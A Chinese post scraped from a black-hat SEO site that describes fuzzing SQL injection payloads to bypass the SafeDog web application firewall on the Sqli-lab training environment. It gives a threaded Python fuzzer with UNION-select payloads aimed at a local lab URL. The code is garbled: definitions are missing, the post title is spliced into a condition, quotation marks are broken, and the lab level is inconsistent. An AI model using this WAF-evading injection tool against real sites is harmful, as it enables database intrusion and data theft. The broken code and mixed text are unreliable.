黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

Fuzz方法注入绕过安全狗

  以Sqli lab的第六关为测试环境

  成功Bypass

  注释里的payload

  可以成功跑出带表名列名的信息

  #encoding=utf8

  import requests

  from queue import Queue

  import threading

  fuzz_zs=[”,'”+” 1,2,3 –+”

  ”’exp=self.root+”‘ “+” 1,2,password

  –+””’

  self.task.put(exp)

  self.s_list=[]

  def visit(self,url):

  try:

  r=requests.get(url,headers=self.headers)

  ret=r.text

  except:

  print (“Fail to connect…”)

  ret=””

  return ret

  def test_url(self):

  while not self.task.empty():

  url=self.task.get()

  ret=self.visit(url)

  if Fuzz方法注入绕过安全狗 “Dhakkan” in ret and not “error” in ret :

  self.s_list.append(url)

  print (url)

  def work(self):

  threads=[]

  for i in range(self.ThreadNum):

  t=threading.Thread(target=self.test_url())

  threads.append(t)

  t.start()

  for t in threads:

  t.join()

  obj=fuzz(“http://192.168.1.109/sqli/Less-5/?id=1”)

  obj.work()

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » Fuzz方法注入绕过安全狗
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜